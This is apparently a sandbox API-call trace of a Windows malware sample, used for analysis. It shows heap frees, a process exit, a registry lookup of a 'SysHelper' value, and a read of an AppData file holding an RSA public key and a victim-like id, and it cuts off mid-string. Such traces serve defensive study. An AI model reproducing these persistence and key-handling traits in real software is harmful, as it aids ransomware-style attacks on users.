[0198.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd3138 | out: hHeap=0x6a0000) returned 1 [0198.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd3970 | out: hHeap=0x6a0000) returned 1 [0198.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd41a8 | out: hHeap=0x6a0000) returned 1 [0198.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd49f0 | out: hHeap=0x6a0000) returned 1 [0198.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd5218 | out: hHeap=0x6a0000) returned 1 [0198.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd5a40 | out: hHeap=0x6a0000) returned 1 [0198.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd6288 | out: hHeap=0x6a0000) returned 1 [0198.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd6ae0 | out: hHeap=0x6a0000) returned 1 [0198.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd7338 | out: hHeap=0x6a0000) returned 1 [0198.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd7b60 | out: hHeap=0x6a0000) returned 1 [0198.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd8388 | out: hHeap=0x6a0000) returned 1 [0198.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd8bd0 | out: hHeap=0x6a0000) returned 1 [0198.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd9418 | out: hHeap=0x6a0000) returned 1 [0198.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd9c50 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cda488 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdacc0 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdb4e8 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdbd10 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdc538 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdcd70 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdd5a8 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c67380 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdddd0 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cde628 | out: hHeap=0x6a0000) returned 1 [0198.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c67c08 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c68490 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdee80 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdf6b8 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cdff00 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce0748 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce0f80 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c68d18 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c695a0 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c69e28 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce1fe8 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce3058 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6a6b0 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce40e0 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce4938 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6af38 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6b7c0 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce3890 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce59d0 | out: hHeap=0x6a0000) returned 1 [0198.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce6a60 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6c8d0 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6d158 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6d9e0 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6c048 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6e268 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c86da8 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c87630 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c88740 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c87eb8 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce83d0 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce8c28 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c88fc8 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c89850 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8a960 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce6218 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8b1e8 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8ba70 | out: hHeap=0x6a0000) returned 1 [0198.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8c2f8 | out: hHeap=0x6a0000) returned 1 [0198.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8a0d8 | out: hHeap=0x6a0000) returned 1 [0198.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8cb80 | out: hHeap=0x6a0000) returned 1 [0198.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce72a8 | out: hHeap=0x6a0000) returned 1 [0198.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc48a0 | out: hHeap=0x6a0000) returned 1 [0198.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fb88 | out: hHeap=0x6a0000) returned 1 [0198.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc5910 | out: hHeap=0x6a0000) returned 1 [0198.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccee68 | out: hHeap=0x6a0000) returned 1 [0198.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc2140 | out: hHeap=0x6a0000) returned 1 [0198.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8fb8 | out: hHeap=0x6a0000) returned 1 [0198.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d13290 | out: hHeap=0x6a0000) returned 1 [0198.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d13b18 | out: hHeap=0x6a0000) returned 1 [0198.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d143a0 | out: hHeap=0x6a0000) returned 1 [0198.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d14c28 | out: hHeap=0x6a0000) returned 1 [0198.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fbf0 | out: hHeap=0x6a0000) returned 1 [0198.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0be40 | out: hHeap=0x6a0000) returned 1 [0198.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0f8f0 | out: hHeap=0x6a0000) returned 1 [0198.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d10108 | out: hHeap=0x6a0000) returned 1 [0198.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d10920 | out: hHeap=0x6a0000) returned 1 [0198.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d11138 | out: hHeap=0x6a0000) returned 1 [0198.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d11950 | out: hHeap=0x6a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d12180 | out: hHeap=0x6a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d12a08 | out: hHeap=0x6a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b320 | out: hHeap=0x6a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ceb6b8 | out: hHeap=0x6a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cebf40 | out: hHeap=0x6a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cec7c8 | out: hHeap=0x6a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ced050 | out: hHeap=0x6a0000) returned 1 [0198.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ced8d8 | out: hHeap=0x6a0000) returned 1 [0198.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc9970 | out: hHeap=0x6a0000) returned 1 [0198.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cee160 | out: hHeap=0x6a0000) returned 1 [0198.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cee9e8 | out: hHeap=0x6a0000) returned 1 [0198.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cca1b8 | out: hHeap=0x6a0000) returned 1 [0198.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccaa00 | out: hHeap=0x6a0000) returned 1 [0198.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccb258 | out: hHeap=0x6a0000) returned 1 [0198.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cef270 | out: hHeap=0x6a0000) returned 1 [0198.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cefaf8 | out: hHeap=0x6a0000) returned 1 [0198.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf9d78 | out: hHeap=0x6a0000) returned 1 [0198.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfa5c0 | out: hHeap=0x6a0000) returned 1 [0198.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf0380 | out: hHeap=0x6a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf0c08 | out: hHeap=0x6a0000) returned 1 [0198.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf1490 | out: hHeap=0x6a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf1d18 | out: hHeap=0x6a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf25a0 | out: hHeap=0x6a0000) returned 1 [0198.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf2e28 | out: hHeap=0x6a0000) returned 1 [0198.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf36b0 | out: hHeap=0x6a0000) returned 1 [0198.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf3f38 | out: hHeap=0x6a0000) returned 1 [0198.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf47c0 | out: hHeap=0x6a0000) returned 1 [0198.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf5048 | out: hHeap=0x6a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfae08 | out: hHeap=0x6a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfb660 | out: hHeap=0x6a0000) returned 1 [0198.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf58d0 | out: hHeap=0x6a0000) returned 1 [0198.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf6158 | out: hHeap=0x6a0000) returned 1 [0198.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf69e0 | out: hHeap=0x6a0000) returned 1 [0198.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfbeb8 | out: hHeap=0x6a0000) returned 1 [0198.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfc700 | out: hHeap=0x6a0000) returned 1 [0198.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf7268 | out: hHeap=0x6a0000) returned 1 [0198.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf7af0 | out: hHeap=0x6a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf8378 | out: hHeap=0x6a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfcf60 | out: hHeap=0x6a0000) returned 1 [0198.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfd7e8 | out: hHeap=0x6a0000) returned 1 [0198.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfe070 | out: hHeap=0x6a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cfe8f8 | out: hHeap=0x6a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cff180 | out: hHeap=0x6a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cffa08 | out: hHeap=0x6a0000) returned 1 [0198.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0cf48 | out: hHeap=0x6a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0d7a0 | out: hHeap=0x6a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d00290 | out: hHeap=0x6a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d00b18 | out: hHeap=0x6a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d013a0 | out: hHeap=0x6a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0dff8 | out: hHeap=0x6a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d01c28 | out: hHeap=0x6a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d024b0 | out: hHeap=0x6a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d02d38 | out: hHeap=0x6a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d035c0 | out: hHeap=0x6a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d03e48 | out: hHeap=0x6a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d046d0 | out: hHeap=0x6a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d04f58 | out: hHeap=0x6a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d057e0 | out: hHeap=0x6a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d06068 | out: hHeap=0x6a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d068f0 | out: hHeap=0x6a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0e840 | out: hHeap=0x6a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0f098 | out: hHeap=0x6a0000) returned 1 [0198.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d07178 | out: hHeap=0x6a0000) returned 1 [0198.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d07a00 | out: hHeap=0x6a0000) returned 1 [0198.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d08288 | out: hHeap=0x6a0000) returned 1 [0198.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d08b10 | out: hHeap=0x6a0000) returned 1 [0198.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d09398 | out: hHeap=0x6a0000) returned 1 [0198.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d09c20 | out: hHeap=0x6a0000) returned 1 [0198.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0a4a8 | out: hHeap=0x6a0000) returned 1 [0198.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0ad30 | out: hHeap=0x6a0000) returned 1 [0198.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d0b5b8 | out: hHeap=0x6a0000) returned 1 [0198.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc9308 | out: hHeap=0x6a0000) returned 1 [0198.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc8af0 | out: hHeap=0x6a0000) returned 1 [0198.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fc58 | out: hHeap=0x6a0000) returned 1 [0198.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc7a78 | out: hHeap=0x6a0000) returned 1 [0198.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ceae30 | out: hHeap=0x6a0000) returned 1 [0198.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc7260 | out: hHeap=0x6a0000) returned 1 [0198.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf9480 | out: hHeap=0x6a0000) returned 1 [0198.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c1fd0 | out: hHeap=0x6a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c0110 | out: hHeap=0x6a0000) returned 1 [0198.814] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0198.814] ExitProcess (uExitCode=0x0) [0198.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf4a8 | out: hHeap=0x6a0000) returned 1 Thread: id = 119 os_tid = 0x418 Thread: id = 120 os_tid = 0x4a0 Thread: id = 121 os_tid = 0x4b4 Thread: id = 122 os_tid = 0x344 Thread: id = 123 os_tid = 0x4d0 Thread: id = 124 os_tid = 0x514 Thread: id = 172 os_tid = 0x430 [0172.347] timeGetTime () returned 0xb94f [0172.347] GetLastError () returned 0x54f [0172.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3bc) returned 0x2ccde38 [0172.348] GetCurrentThreadId () returned 0x430 [0172.348] SetLastError (dwErrCode=0x54f) [0172.348] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x90ca5e4 | out: phkResult=0x90ca5e4*=0x4ec) returned 0x0 [0172.348] RegQueryValueExW (in: hKey=0x4ec, lpValueName="SysHelper", lpReserved=0x0, lpType=0x90ca5d8, lpData=0x90ca5e0, lpcbData=0x90ca5dc*=0x4 | out: lpType=0x90ca5d8*=0x4, lpData=0x90ca5e0*=0x1, lpcbData=0x90ca5dc*=0x4) returned 0x0 [0172.348] RegCloseKey (hKey=0x4ec) returned 0x0 [0172.348] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x90ca4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0172.348] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0172.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6c6388 [0172.349] AreFileApisANSI () returned 1 [0172.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x90ca4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0172.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0172.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x90ca4e4, cbMultiByte=-1, lpWideCharStr=0x6fab90, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0172.362] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x90ca368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0172.363] GetFileType (hFile=0x4ec) returned 0x1 [0172.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0172.378] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x90ca418 | out: lpNewFilePointer=0x0) returned 1 [0172.378] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x90ca410 | out: lpNewFilePointer=0x0) returned 1 [0172.378] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x90c93f4 | out: lpNewFilePointer=0x0) returned 1 [0172.379] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x90c93ec | out: lpNewFilePointer=0x0) returned 1 [0172.379] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x90ca434 | out: lpNewFilePointer=0x0) returned 1 [0172.379] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x90ca42c | out: lpNewFilePointer=0x0) returned 1 [0172.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1000) returned 0x2cce200 [0172.379] ReadFile (in: hFile=0x4ec, lpBuffer=0x2cce200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x90ca3c4, lpOverlapped=0x0 | out: lpBuffer=0x2cce200*, lpNumberOfBytesRead=0x90ca3c4*=0x22d, lpOverlapped=0x0) returned 1 [0172.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce200 | out: hHeap=0x6a0000) returned 1 [0172.393] CloseHandle (hObject=0x4ec) returned 1 [0172.393] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0172.393] lstrcpyA (in: lpString1=0x90cab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC 